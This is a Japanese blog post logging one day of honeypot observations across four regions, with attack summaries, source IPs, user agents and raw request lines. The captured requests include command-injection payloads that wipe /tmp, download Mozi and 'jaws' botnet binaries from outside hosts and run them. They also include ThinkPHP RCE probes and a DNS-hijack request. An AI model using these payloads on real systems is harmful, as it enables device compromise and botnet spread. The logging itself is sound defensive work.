コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/06/01 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2021/06/01分です。

特徴
共通

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

/.envへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  116.202.106.221/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
cd /tmp;
rm -rf *;
wget http[:]//219[.]155[.]100[.]112:58426/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:US

GPONルータの脆弱性を狙うアクセス
D-link製品へDNS hijackingを狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

Location:UK

NetGear製品の脆弱性を狙うアクセス
Oracle WebLogic脆弱性(CVE-2020-14882,CVE-2020-14883,CVE-2020-14750)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
libwww-perlによるスキャン行為
Nmap Scripting Engineによるスキャン行為
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  116.202.106.221/jaws;
sh /tmp/jaws
Location:SG

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  116.202.106.221/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:160 (前日比:-262)
US:総アクセス数:310 (前日比:+247)
UK:総アクセス数:340 (前日比:+54)
SG:総アクセス数:172 (前日比:-81)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.25.141.247 United States
1 13.68.135.134 United States
1 23.102.154.0 United States
1 34.68.10.105 United States
2 34.212.160.2 United States
2 41.140.75.141 Morocco
22 45.146.164.125 Russia
1 51.103.86.106 United Kingdom
3 51.141.55.151 United Kingdom
1 51.210.137.28 France
1 54.188.196.95 United States
2 67.205.174.60 United States
101 77.111.61.125 Slovenia
6 95.217.191.109 Germany
1 110.250.124.30 China
1 113.255.148.233 Hong Kong
7 128.14.141.103 United States
1 172.105.89.161 United States
1 175.4.215.44 China
1 185.153.196.72 Russia
1 211.48.139.39 South Korea
1 217.79.181.170 Germany
1 219.155.100.112 China

UserAgent一覧

件数 UserAgent
12 -
2 Hello, world
2 Mozilla 5/0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
19 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
7 \x16\x03\x01
20 GET /.env HTTP/1.1
1 GET //.env HTTP/1.1
1 GET //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
3 GET /shell?cd+/tmp;rm+-rf+*;wget+ 116.202.106.221/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//219[.]155[.]100[.]112:58426/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/phpunit.xml HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.15.224.48 China
11 45.146.164.125 Russia
1 61.242.40.221 China
1 68.183.18.95 United States
1 111.92.80.82 India
7 125.64.94.144 China
122 129.226.170.141 Singapore
2 134.122.80.103 United States
159 152.32.216.214 Hong Kong
3 163.172.159.134 United Kingdom
1 172.104.242.173 United States
1 185.153.196.72 Russia

UserAgent一覧

件数 UserAgent
67 -
2 Hello, World
102 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
122 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.2; rv:57.0.1) Gecko/20100101 Firefox/57.0.1
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
1 curl/7.68.0
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
57 -
1 \x03
7 \x16\x03\x01
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /Content/common/web/CommonActivity.css HTTP/1.1
1 GET /Content/css/wzwstylel.css HTTP/1.1
1 GET /Css/index.css HTTP/1.1
1 GET /Front/User/UserLogin.html HTTP/1.1
1 GET /Home/GetAllGameCategory HTTP/1.1
2 GET /MyAdmin/index.php?lang=en HTTP/1.1
2 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /PMA2011/index.php?lang=en HTTP/1.1
3 GET /PMA2012/index.php?lang=en HTTP/1.1
2 GET /PMA2013/index.php?lang=en HTTP/1.1
1 GET /PMA2019/index.php?lang=en HTTP/1.1
3 GET /PMA2020/index.php?lang=en HTTP/1.1
2 GET /PMA2021/index.php?lang=en HTTP/1.1
1 GET /Promotions/list.mvc HTTP/1.1
1 GET /Public/Home/js/cls.js HTTP/1.1
1 GET /Public/Wchat/js/cvphp.js HTTP/1.1
1 GET /Public/css/_pk10.css HTTP/1.1
1 GET /Res/font/font.css HTTP/1.1
1 GET /Template/Mobile/js/main.js HTTP/1.1
1 GET /Templates/user/finance/css/userPay.css HTTP/1.1
1 GET /Templates/user/js/global.js HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /account/login HTTP/1.1
3 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/pMA/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
2 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
2 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /ajax/allcoin_a/id/0?t=0.3782499195965951 HTTP/1.1
1 GET /anquan/qgga.asp HTTP/1.1
1 GET /api/ApiHub/fetchJinse HTTP/1.1
1 GET /api/contactWay HTTP/1.1
1 GET /api/content_bottom HTTP/1.1
1 GET /api/currency/quotation_new HTTP/1.1
1 GET /api/exclude/siteConfig/webSiteConfig HTTP/1.1
1 GET /api/index/loansList HTTP/1.1
1 GET /api/message/webInfo HTTP/1.1
1 GET /api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1 HTTP/1.1
1 GET /api/uploads/apimap HTTP/1.1
1 GET /api/user/get_user_group HTTP/1.1
1 GET /api/user/info?&&callback=jsonp_1601457046411_20983 HTTP/1.1
1 GET /api/user/ismustmobile HTTP/1.1
1 GET /api/v/index/queryOfficePage?officeCode=customHomeLink HTTP/1.1
1 GET /assets/extension/market/css/mt4.css HTTP/1.1
1 GET /assets/js/dmshub.js HTTP/1.1
1 GET /base/exchange_index/changepwdfirst HTTP/1.1
1 GET /common/member/js/user.util.js HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config.php?_=3283&1922563758 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /cq/kehulistajax.php HTTP/1.1
1 GET /csjs/bankCheck.js HTTP/1.1
1 GET /css/all.css HTTP/1.1
1 GET /css/app.css HTTP/1.1
1 GET /css/dafa.css HTTP/1.1
1 GET /css/main.css HTTP/1.1
1 GET /css/style.css HTTP/1.1
1 GET /data/json/config.json HTTP/1.1
2 GET /database/index.php?lang=en HTTP/1.1
2 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
3 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
2 GET /db/websql/index.php?lang=en HTTP/1.1
2 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /dnscfg.cgi?dnsPrimary=192.95.59.130&dnsSecondary8.8.4.4&dnsDynamic=0&dnsRefresh=1 HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /ff/css/cssy.css HTTP/1.1
1 GET /getConfig/listPopFrame.do?code=1&position=index&_=1601489645097 HTTP/1.1
1 GET /getLocale HTTP/1.1
1 GET /h5/ HTTP/1.1
1 GET /home/GetQrCodeInfo HTTP/1.1
1 GET /home/login/login_index.html HTTP/1.1
1 GET /home/main/login HTTP/1.1
2 GET /homes/ HTTP/1.1
1 GET /im/in/GetUuid HTTP/1.1
1 GET /index.php?m=api&c=app&a=getPlatformConfig HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index/api/config HTTP/1.1
1 GET /infe/rest/flash/getServerIP.json HTTP/1.1
1 GET /ipl/app/flash/publicbmw/ball/FigLeaf.js?site=member HTTP/1.1
1 GET /js/base.js HTTP/1.1
1 GET /js/base1.js HTTP/1.1
1 GET /kkrps/im_group/show_members HTTP/1.1
1 GET /lanren/css/global.css HTTP/1.1
1 GET /locale/Goex/zh/common.js HTTP/1.1
1 GET /login/img/nyyh/game.css HTTP/1.1
1 GET /m/ticker/usdtqc HTTP/1.1
1 GET /manager/js/left.js HTTP/1.1
1 GET /market/market-ws/iframe.html HTTP/1.1
1 GET /mh/phone.do HTTP/1.1
1 GET /mobile/config.js HTTP/1.1
1 GET /mobile/script/main.m.js HTTP/1.1
1 GET /mobile/v3/appSuperDownload.do HTTP/1.1
1 GET /mtja.html HTTP/1.1
1 GET /myConfig.js HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
2 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /otc/ HTTP/1.1
1 GET /pages/console/js/common.js HTTP/1.1
3 GET /php-myadmin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
3 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
3 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
2 GET /pma2011/index.php?lang=en HTTP/1.1
1 GET /pma2013/index.php?lang=en HTTP/1.1
1 GET /pma2015/index.php?lang=en HTTP/1.1
3 GET /pma2016/index.php?lang=en HTTP/1.1
1 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2019/index.php?lang=en HTTP/1.1
1 GET /pma2020/index.php?lang=en HTTP/1.1
2 GET /pma2021/index.php?lang=en HTTP/1.1
1 GET /public/admin.php/api/index/loansList HTTP/1.1
1 GET /public/css/style.css HTTP/1.1
1 GET /public/h5static/js/main.js HTTP/1.1
1 GET /public/web/css/add//index.css HTTP/1.1
1 GET /public/web/js/add/com.js HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /room/1002 HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /site/get-hq?proNo=btc&panType=1&pid=1 HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
4 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /static/common/js/global.js HTTP/1.1
1 GET /static/data/configjs.js HTTP/1.1
1 GET /static/data/gamedatas.js HTTP/1.1
1 GET /static/data/thirdgames.json HTTP/1.1
1 GET /static/index/js/lk/order.js HTTP/1.1
1 GET /static/login/js/lk/order.js HTTP/1.1
1 GET /static/xianyu/js/bankCheck.js HTTP/1.1
1 GET /stock/search.html?keyword=00202 HTTP/1.1
1 GET /template/css/login.css HTTP/1.1
1 GET /template/tmp1/js/common.js HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /views/commData/commonSite.js HTTP/1.1
1 GET /wap/trading/lastKlineParameter HTTP/1.1
1 GET /web/api/getBanner HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /xianyu/index/setp1.html HTTP/1.1
1 GET /xy/ HTTP/1.1
1 GET /xy/image/jiantou.png HTTP/1.1
1 GET /zz2/address.php?gid=651 HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /api/system/system/config/get HTTP/1.1
1 POST /api/v1/borrowxx.html HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//kaymcclurg[.]best/9a8d14ab63f32f967ca6e9ab070f773bcf96d91a01ff73aa9167e929fd8ee6748ee16b9beb42f746bd5bbe91ff59acbdfff2dfa4b61f46f89feee04354002dea00d4538f9f50ed62e4525a1a2e010a5f1da9daff0ad5ed3cfbeb7c502492031d HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
11 45.146.164.125 Russia
1 61.239.98.96 Hong Kong
122 67.173.18.250 United States
1 84.38.186.69 Russia
122 130.61.200.114 United States
65 132.145.53.85 United States
10 134.175.245.162 China
1 161.35.208.138 United States
1 162.62.123.46 Singapore
1 165.232.182.238 United States
2 167.71.68.203 United States
1 178.175.58.140 Albania
1 185.153.196.72 Russia
1 190.202.164.213 Venezuela

UserAgent一覧

件数 UserAgent
5 -
1 Go-http-client/1.1
244 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
65 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
2 libwww-perl/6.54
2 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 GET /.git/HEAD HTTP/1.1
2 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
2 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
2 GET /PMA2011/index.php?lang=en HTTP/1.1
1 GET /PMA2012/index.php?lang=en HTTP/1.1
2 GET /PMA2013/index.php?lang=en HTTP/1.1
1 GET /PMA2014/index.php?lang=en HTTP/1.1
1 GET /PMA2016/index.php?lang=en HTTP/1.1
3 GET /PMA2017/index.php?lang=en HTTP/1.1
4 GET /PMA2018/index.php?lang=en HTTP/1.1
2 GET /PMA2019/index.php?lang=en HTTP/1.1
4 GET /PMA2020/index.php?lang=en HTTP/1.1
3 GET /PMA2021/index.php?lang=en HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
3 GET /_ignition/execute-solution HTTP/1.1
2 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
4 GET /admin/db/index.php?lang=en HTTP/1.1
2 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/info/config HTTP/1.1
3 GET /admin/pMA/index.php?lang=en HTTP/1.1
2 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
2 GET /admin/web/index.php?lang=en HTTP/1.1
2 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
3 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /api/spec.json HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /console/css/%252E%252E%252Fconsole.portal HTTP/1.1
1 GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
1 GET /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
1 GET /console/images/%252e%252e%252fconsole.portal HTTP/1.1
3 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
2 GET /db/dbweb/index.php?lang=en HTTP/1.1
2 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
3 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
3 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
4 GET /db/webadmin/index.php?lang=en HTTP/1.1
2 GET /db/webdb/index.php?lang=en HTTP/1.1
2 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
2 GET /login?from=%2F HTTP/1.1
3 GET /myadmin/index.php?lang=en HTTP/1.1
3 GET /mysql-admin/index.php?lang=en HTTP/1.1
2 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
4 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
3 GET /mysql/pMA/index.php?lang=en HTTP/1.1
4 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
2 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /nmaplowercheck1622426589 HTTP/1.1
1 GET /opc/v1/identity HTTP/1.1
1 GET /opc/v1/instance HTTP/1.1
6 GET /php-my-admin/index.php?lang=en HTTP/1.1
2 GET /php-myadmin/index.php?lang=en HTTP/1.1
4 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
3 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
4 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
2 GET /phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /phpmy/index.php?lang=en HTTP/1.1
4 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
4 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
4 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
4 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
4 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
5 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
3 GET /phppma/index.php?lang=en HTTP/1.1
2 GET /pma/index.php?lang=en HTTP/1.1
1 GET /pma2011/index.php?lang=en HTTP/1.1
3 GET /pma2012/index.php?lang=en HTTP/1.1
2 GET /pma2013/index.php?lang=en HTTP/1.1
6 GET /pma2014/index.php?lang=en HTTP/1.1
2 GET /pma2016/index.php?lang=en HTTP/1.1
5 GET /pma2017/index.php?lang=en HTTP/1.1
2 GET /pma2018/index.php?lang=en HTTP/1.1
3 GET /pma2020/index.php?lang=en HTTP/1.1
1 GET /pma2021/index.php?lang=en HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//190[.]202[.]164[.]213:46066/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 116.202.106.221/jaws;sh+/tmp/jaws
3 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /spec/api.json HTTP/1.1
3 GET /sql/myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
3 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
7 GET /sql/webdb/index.php?lang=en HTTP/1.1
2 GET /sql/websql/index.php?lang=en HTTP/1.1
2 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /ui HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 HEAD /actuator HTTP/1.1
1 HEAD /actuator/auditevents HTTP/1.1
1 HEAD /actuator/beans HTTP/1.1
1 HEAD /actuator/conditions HTTP/1.1
1 HEAD /actuator/configprops HTTP/1.1
1 HEAD /actuator/env HTTP/1.1
1 HEAD /actuator/health HTTP/1.1
1 HEAD /actuator/heapdump HTTP/1.1
1 HEAD /actuator/httptrace HTTP/1.1
1 HEAD /actuator/hystrix.stream HTTP/1.1
1 HEAD /actuator/info HTTP/1.1
1 HEAD /actuator/jolokia HTTP/1.1
1 HEAD /actuator/loggers HTTP/1.1
1 HEAD /actuator/mappings HTTP/1.1
1 HEAD /actuator/metrics HTTP/1.1
1 HEAD /actuator/scheduledtasks HTTP/1.1
1 HEAD /actuator/threaddump HTTP/1.1
1 HEAD /auditevents HTTP/1.1
1 HEAD /autoconfig HTTP/1.1
1 HEAD /beans HTTP/1.1
1 HEAD /cloudfoundryapplication HTTP/1.1
1 HEAD /configprops HTTP/1.1
1 HEAD /dump HTTP/1.1
1 HEAD /env HTTP/1.1
1 HEAD /health HTTP/1.1
1 HEAD /heapdump HTTP/1.1
1 HEAD /hystrix.stream HTTP/1.1
1 HEAD /info HTTP/1.1
1 HEAD /jolokia HTTP/1.1
1 HEAD /loggers HTTP/1.1
1 HEAD /mappings HTTP/1.1
1 HEAD /metrics HTTP/1.1
1 HEAD /threaddump HTTP/1.1
1 HEAD /trace HTTP/1.1
1 OPTIONS / HTTP/1.0
11 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 PROPFIND / HTTP/1.1
1 RFML / HTTP/1.1
Location:SG

送信元IPアドレス一覧
